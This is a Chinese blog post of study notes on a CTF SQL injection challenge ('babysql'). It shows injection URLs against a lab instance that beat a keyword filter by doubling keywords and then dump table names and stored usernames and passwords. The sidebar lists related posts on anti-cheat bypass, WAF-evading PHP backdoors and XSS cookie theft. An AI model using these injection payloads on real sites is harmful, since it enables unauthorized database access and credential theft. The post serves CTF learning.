网络安全学习笔记——bypass绕过(babysql)

已于 2023-11-04 16:10:50 修改
阅读量81 收藏
点赞数
分类专栏: 网络安全 文章标签: web安全 学习 笔记
于 2023-05-13 23:43:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_72324806/article/details/130664052
版权

注意点——在注入的时候测试过or是被过滤了的,所以之后所有的关键字涉及or的地方都会被挖掉,所以遇见or也要乱序双写 ,遇见关键字也是要乱序双写

闭合以及注释都在传参的后面完成

http://ab27899d-40b7-4e84-9fc8-c7c334c13c3a.node4.buuoj.cn:81/check.php?username=1&password=1'-- -

此时and关键字被过滤
1. 可使用like关键字代替;anandd乱序绕过——同样order by乱序也可绕过
2. 使用And发现大小写不行;&&代替and的逻辑操作符不行
3. 使用or————发现仍旧被过滤

http://ab27899d-40b7-4e84-9fc8-c7c334c13c3a.node4.buuoj.cn:81/check.php?username=1&password=1'and 1=1-- -

使用order by 查询数据表列数

http://ab27899d-40b7-4e84-9fc8-c7c334c13c3a.node4.buuoj.cn:81/check.php?username=1&password=1'oorrder bbyy 3-- -

然后联合查询————仍旧使用乱序绕过

http://ab27899d-40b7-4e84-9fc8-c7c334c13c3a.node4.buuoj.cn:81/check.php?username=1&password=1'ununionion seselectlect 1,database(),3-- -

查到数据库名为geek,然后爆表名

http://ab27899d-40b7-4e84-9fc8-c7c334c13c3a.node4.buuoj.cn:81/check.php?username=1&password=1'ununionion seselectlect 1,group_concat(table_name),3 frfromom infoorrmation_schema.tables whwhereere table_schema=database()-- -

得到表名有b4bsql和geekuser,然后爆列名

http://ab27899d-40b7-4e84-9fc8-c7c334c13c3a.node4.buuoj.cn:81/check.php?username=1&password=1'ununionion seselectlect 1,group_concat(column_name),3 frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql'-- -

此时得到flag

http://ab27899d-40b7-4e84-9fc8-c7c334c13c3a.node4.buuoj.cn:81/check.php?username=1&password=1'ununionion seselectlect 1,group_concat(username,0x3a,passwoorrd),3 frfromom b4bsql-- -

Nosery
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
NP学习笔记2 BYPASS NP
05-24
学会了如何bypass掉冒险的np. 我也是摸索出来的,参考MPC上的方法,还要感谢dubious的帮助 先讲讲跳过nProtect的思路 1. 首先你机器是一个WEB服务器。 2. 你的WEB端口为8086 3. 在你的WEB服务器的根目录里建立目录:\maplestory\nProtect\GameGuard\RealServer\在目录中放入已经被你修改的不在防外挂的nProtect。 4. 修改hosts文件: 127.0.0.1 nprotect1.mxd.sdo.com 127.0.0.1 nprotect2.mxd.sdo.com 127.0.0.1 update.nProtect.com 127.0.0.1 update.nProtect.net
企业安全测试--Bypass.pdf
最新发布
04-22
价值5999,vip免费阅读,可用于实战拟态,渗透测试学习,资源复现,红蓝对抗,攻防打点,漏洞复现,技术考证、权限维持,应急响应,Hvv实战
NP学习笔记4 BYPASS NP
05-24
Now that everything is set up, you could technically start MapleStory. But we don't have anything to edit MapleStory's memory with right now, do we? Visit the lovely and click Download and then Cheat Engine 5.2. If the download is not available, get it () After downloading and extracting the installer file, run it. It as well is pretty straight forward. Choose an install [] and you're off. If it asks you to restart your computer, please do so.Configuring your Cheat Engine.This step should be followed carefully. If you tick something you aren't supposed to, bad things could happen.a) Launch Cheat Engine. It will ask you a few questions for the first launch. Click through them. You'll notice the CE logo in the top right corner; under it there is a setting button. Click it. ()b) There are six tabs at the top of the Cheat Engine settings. Make sure each one of them looks as displayed in the images bellow.General Settings: ()Scan Settings: ()File Associations: ()Code Finder: ()Assembler: ()Extra: ()Note: It is important in this last tab that you not click "Stealthmode (usermode)" as described in DragonBroly's tutorial. It is not needed and can conflict with kernalmode in some unappealing ways. [eg: restart your computer when closing MapleStory]c) Click OK on the settings dialog. You are all done
海康威视-网络通讯库错误码
心猿意码的博客
07-06 2万+
海康威视-网络通讯库错误码 错误类型 错误值 错误信息 NET_DVR_NOERROR 0 没有错误。 NET_DVR_PASSWORD_ERROR 1 用户名密码错误。注册时输入的用户名或者密码错误。 NET_DVR_NOENOUGHPRI 2 权限不足。一般和通
海康威视错误代码文档大全【完整版】
热门推荐
wgh0315的博客
12-14 4万+
海康威视错误代码文档大全
网络安全学习笔记——ByPass绕过
just do it
05-13 310
MYSQL的substr第一位从1开始切割bypass绕过,一般绕过绕过防火墙,绕过waf,绕过本地的360,绕过网站的看门狗等waf检测机制其实很简单,核心就是正则匹配,虽然说还有字符串强行匹配,还有什么语义解析,但是实际上还是正则居多所有的网站都会与数据库交互,但不一定所有的网站都存在SQL注入漏洞,因为可以对输入的内容进行过滤特殊字符,关键字,空格等,一般都可以使用别的字符代替过滤空格时的绕过使用 /**/MySQL自定义的注释符当作一个函数php语言%0a。
bypass绕过
孤桜懶契
05-16 1450
本地搭建安全狗安装坑 系统服务启动的坑 管理员模式在apache目录执行 httpd.exe -k install -n apache2.0 如果要删除服务重新来,可以输下面这个,给你留着备用 D:phpStudyApachebin>httpd.exe -k install -n apache2.4 sc delete apache2.0 简介WAF WAF是一个缩写,全名web应用防护系统(Web Application Firewall),是通过执行一系列针对HTTP/HTTPS的安全
Bypass注入(WAF绕过
一醉一休的博客
03-16 709
1.WAF介绍  WAF,web应用防火墙,通过执行一系列针对HTTP/HTTPS的安全策略来专门为web应用提供保护的产品  waf分类:  (1)软waf:以软件的形式部署在服务器上,比如某狗,某锁,某盾等等,它直接检测服务器上是否存在webshell、是否有文件创建  (2)硬waf:以硬件的形式部署在链路中,支持多种部署方式,当串联到链路中可以拦截恶意流量  (3)云 waf:各种云平台的内置waf,也可以说是带防护功能的CDN 1.大小写混写  在规则匹配时只针对了特定大小写或特定小写的情况下,通
XSS————XSS绕过Bypass的各种各样姿势
Fly_鹏程万里
04-16 1万+
XSS 攻击是一种攻击者将 JavaScript 代码注入到用户运行页面中的攻击。为了避免这种攻击,一些应用会尝试从用户输入中移除 JavaScript 代码,但这很难完全实现。在本文中会先展示一些尝试过滤 JavaScript 的代码,并随后给出其绕过方法。以一个网上商城应用Magento中的过滤类 Mage_Core_Model_Input_Filter_MaliciousCode为例,部分代...
渗透之路 WAF Bypass【第一篇】绕过思路
dfu65065的博客
09-08 895
WAF是什么 Web Application Firewall,web应用层防火墙 WAF分类 软件、硬件 防护原理 1.针对每种漏洞做特定防护 2.基于已有漏洞做防护 3.总之就是对关键字进行过滤 绕过思路 针对每种漏洞的防护做特点绕过 对关键字进行奇淫技巧的“加壳”(正则绕过) 注意:所有的绕过命令在执行时必须是可以执行的语句 转载于:https://w...
NP学习笔记3 BYPASS NP
05-24
This has been a description of how to use the DES algorithm to encrypt one 64-bit block. To decrypt, use the same process, but just use the keys K[i] in reverse order. That is, instead of applying K[1...
FRPFILE iCloud Bypass Tool v3一键绕过工具可正常关机重启
08-23
FRPFILE iCloud Tool工具现在更新V3版本绕过后可以正常关机重启。支持所有用checkra1n越狱的设备包括iPhone\iPad。支持iPhone5s~X的所有型号,支持iPad mini2/3/4,支持iPad Air1、iPad Air2,支持iPad Pro1、2。...
bypass-clm:PowerShell受限语言模式绕过
05-24
PowerShell受限语言模式绕过这将生成一个可执行文件,即使启用了约束语言模式,该可执行文件也会执行完整语言模式powershell会话。 在撰写本文时,我发现的唯一绕过方法是降级为PowerShell版本2或使用.Net中的运行...
cloudflare-bypass:NodeJS工具绕过Cloudflare iUam V2
04-28
绕云绕道 一个NodeJS工具绕过Cloudflare IUAM v2。这个怎么运作JS挑战( jsch )包含多个串联JavaScript挑战。 我正在尝试对所有这些进行逆向工程,在可以看到已经逆转的所有挑战。 验证码挑战可以在JS挑战之后提出...
cf-bypass:绕过Cloudflare的简单工具
03-26
cf-bypass 绕过Cloudflare的简单工具首先启动此工具: git clone cd cf-bypass python3 main.py -u example.com
PHP利用某些函数bypass waf探讨
goddemon
07-22 358
前几天写了一篇文章,由黑到白这篇文章中用到echo的一个特性去一步一步写马看师傅们的评论然后去研究了下原因学到了很多比如linux写shell少了_POST空格以及$这些字符都写不进去也恰好看到了微信公众号里面有个师傅写了篇文章链接如下https里面提到了一个tips利用get_headers绕过了waf顿时引来了自己的兴趣,因为目前的很多waf是基于post包和get包来拦截的如果我把参数内容可控到header头里面不就能稳稳的过了嘛。............
网络安全学习笔记——盗取Cookies跨站脚本(XSS)
just do it
07-24 1058
使用替换过了的URL发给目标,诱导目标点击,然后目标的cookies就会回弹到XSS攻击平台上,展开就可以看到该目标的PHPSESSID,然后在自己的同源网站上,笔记本按Fn+F12,调出Hackerbar,点击存储,然后把PHPSESSID换成攻击之后得到的,删掉浏览框里面多余的东西,剩下XXX.php即可,刷新之后就会登录该目标的账号——,SESSID——中间键,是Apache分配的,唯一的“身份证”,从SESSID入手,就可以查取用户的相关信息。
bypass各种waf--php回调后门
qq_43710889的博客
08-15 316
文章目录bypass各种waf--php回调后门一般过狗思路双参数回调后门uasortarray_reducearray_udiff单参数后门终极奥义这个是php全版本支持的,且不报不杀稳定执行:再来一个:参考链接: bypass各种waf–php回调后门 一般过狗思路 call_user_func('assert', $_REQUEST['pass']) 双参数回调后门 uasort <?php $e=$_REQUEST['e']; $arr=array('test', $_REQUEST['p
CTFHub-SSRF(全部)
1stPeak's Blog
08-01 2435
文章目录内网访问伪协议读取文件端口扫描POST请求 内网访问 解题步骤 伪协议读取文件 解题步骤 端口扫描 提示: 根据提示对目标端口进行爆破 注:使用字典也可以,用for循环写一个字典出来,还有就是爆破时线程不能太高,太高容易失败,无法爆出来 POST请求 注:中途靶机重启过一次,网址有些改变,不要在意,看payload即可 解题步骤 根据网上的一些内容,他共有3个php文件,分别是flag.php、302.php、index.php http://challenge-d01e92
ByPass Mode(略过模式或旁路模式)
05-31
ByPass Mode(略过模式或旁路模式)是指在某些设备中,当设备出现故障或异常时,可以通过将设备设置为ByPass Mode来绕过该设备,使得数据可以继续传输或流动,从而保证整个系统的正常工作。在ByPass Mode下,设备会直接将输入信号发送到输出端口,而不进行任何处理,以此来减少对整个系统的影响。ByPass Mode通常是在维修或故障排除时使用的一种手段,以保证整个系统的连续性和可靠性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Nosery

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值